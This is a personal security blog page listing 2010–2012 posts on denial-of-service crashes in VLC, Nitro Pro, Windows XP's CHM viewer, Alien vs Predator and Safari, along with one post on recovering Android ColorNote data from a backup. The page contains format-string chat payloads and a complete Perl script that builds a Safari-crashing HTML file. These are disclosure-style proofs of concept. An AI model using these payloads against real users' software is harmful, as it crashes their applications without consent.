2012-10-18

VLC Media Player 2.0.3 - .AVI DoS POC

VLC media player (2.0.3 Twoflower) - .AVI DoS Exploit:

!exploitable result:
Exploitability Classification: UNKNOWN
Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at KERNELBASE!lstrlenW+0x000000000000001a (Hash=0x2e3a5a04.0x79532c61)
The data from the faulting address is later used to determine whether or not a branch is taken. 
Download Here.
Posted by at 1 comment:
Labels: , , , ,

2012-10-07

Nitro Pro 8.0.3.1 - .PDF DoS POC

New Nitro Pro 8 (8.0.3.1) PDF Reader - .PDF DoS Exploit:

!exploitable result:

BUG_TITLE:Exploitable - User Mode Write AV starting at npdf!ProvideCoreHFT+0x000000000010886a (Hash=0x265b4f1d.0x020d4f2c)
EXPLANATION:User mode write access violations that are not near NULL are exploitable.
Download Here.
Posted by at 1 comment:
Labels: , , , ,

2012-03-10

Android ColorNote, notes recovery

So I decided to upgrade the custom Android ROM on my HTC HD2 (Leo), and totally forgot about some of the important notes I left in the Android app ColorNote.

Fortunately before I upgraded my ROM, I made a backup using Clockwork Recovery Mod and saved it to my PC.

So I put my forensics hat on and got to work:

The backup consisted of the following files:
.android_secure.img
boot.img
cache.img
data.img
nandroid.md5
recovery.img
sd-ext.img
system.img
The IMG files are using the Yet Another Flash File System (YAFFS).
A quick Google and I came across this post on the XDA Devs Forums.
(Download the attachment to the forum thread) This is a Cygwin ported version of 'unyaffs'.

Next was to work out which IMG file to use... So I cheated and asked Android guru Noobhands who pointed me at the data.img (Thx dude!).

The 'unyaffs' is simple to use:
unyaffs.exe data.img
This extracts the contents of the IMG to the current folder.

Android apps store data in the "data" folder. Having a large number of apps on my Phone, I now had to work out which folder was actually ColorNote.
The easy way todo this is to look at the Apps ID in Google Market:
https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note
Sure enough, the folder is there. Within this folder is the folder "databases".
This folder contains the following:
colornote.db
internal.db
internal.db-shm
internal.db-wal
Quickly examining the .DB files with a Hexeditor I confirmed they were SQLite 3 databases.
So I opened the colornote.db with SQLite Browser, switched to the 'Browse Data' tab, and changed the table to "notes" and sure enough all my missing notes were there! woot! :)

Now what's also interesting, all of my old deleted notes are also still stored, along with the 'create', 'modified', and 'minor modified' dates.
Posted by at 11 comments:
Labels: , , ,

2011-08-22

WinXP Compiled Help File (CHM) DoS (hh.exe)

Here's a PoC Windows XP 'Compiled Help File' (CHM) DoS which has been sitting on my hard disk for a while, tested working on fully patched WinXP SP3 32bit machine:

Crashing Executable: hh.exe
Version: 5.2.3790.2453

WinDbg result:
(ed8.edc): Stack overflow - code c00000fd (!!! second chance !!!)
eax=00042968 ebx=000af0b0 ecx=00042964 edx=0007ebb0 esi=000af0b0 edi=0007ebe0
eip=65e3d633 esp=0007e95c ebp=0007ebb4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
itss!_chkstk+0x33:
65e3d633 8501 test dword ptr [ecx],eax ds:0023:00042964=00000000
!exploitable result:
Exploitability Classification: UNKNOWN
Recommended Bug Title: Stack Overflow starting at itss!_chkstk+0x0000000000000033 (Hash=0x7c592e02.0x7a176714)
Download PoC Here
Posted by at No comments:
Labels: , , ,

2010-02-27

New 'Alien vs Predator' Format String Bugs

Alien vs Predator (Feb 17 patch) is vulnerable to Format String attacks.

Posting the following in Chat (either in game or in the lobby) will crash your game, I am not sure if it will crash other users, I haven't got anybody to test on.

%s%s%s%s%s%s%s%s%s%s
or
%n%n%n%n%n%n%n%n%n%n

Setting your Name to: '%n' will stop you from ever joining a game, you just get an error reporting your unable to connect.
Setting your Name to '%i' will set your Name to random numbers which changes as you play.

I tried contacting Steam/Rebellion/Sega, but so far had no response.
Posted by at No comments:
Labels: ,

2010-01-20

New 0Day Safari 'background' DoS

New 0Day Safari DoS I found last night.
Can somebody test to confirm its working for them?
Usage: perl Safari_4.0.4_background_DoS.pl output.htm 114516
Then browse to output.htm in Safari.


#!/usr/bin/perl
#
# Safari 4.0.4 (531.21.10) - Stack Overflow/run
# 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0]
# Tested on WinXP (32bit) SP3
#
# Magic Numbers:
# 114516 -> 114718 : Safari quits without error
# 114719 : Safari quits with illegal operation:
# AppName: safari.exe
# AppVer: 5.31.21.10
# ModName: cfnetwork.dll
# ModVer: 1.450.5.0
# Offset: 000567a7

$filename = $ARGV[0];
$buffer = $ARGV[1];
if(!defined($filename))
{
print "Usage: $0 <filename.html> <buffer>\n\n";
}

$header = "<html>
<head>" . "\n";
$crash = "<body background = \"" . "A" x $buffer . "\">" . "\n";
$footer = "</html>" . "\n";

$data = $header . $crash . $footer;

open(FILE, '>' . $filename);
print FILE $data;
close(FILE);

exit;
Posted by at 2 comments:
Labels: ,
Subscribe to: Posts (Atom)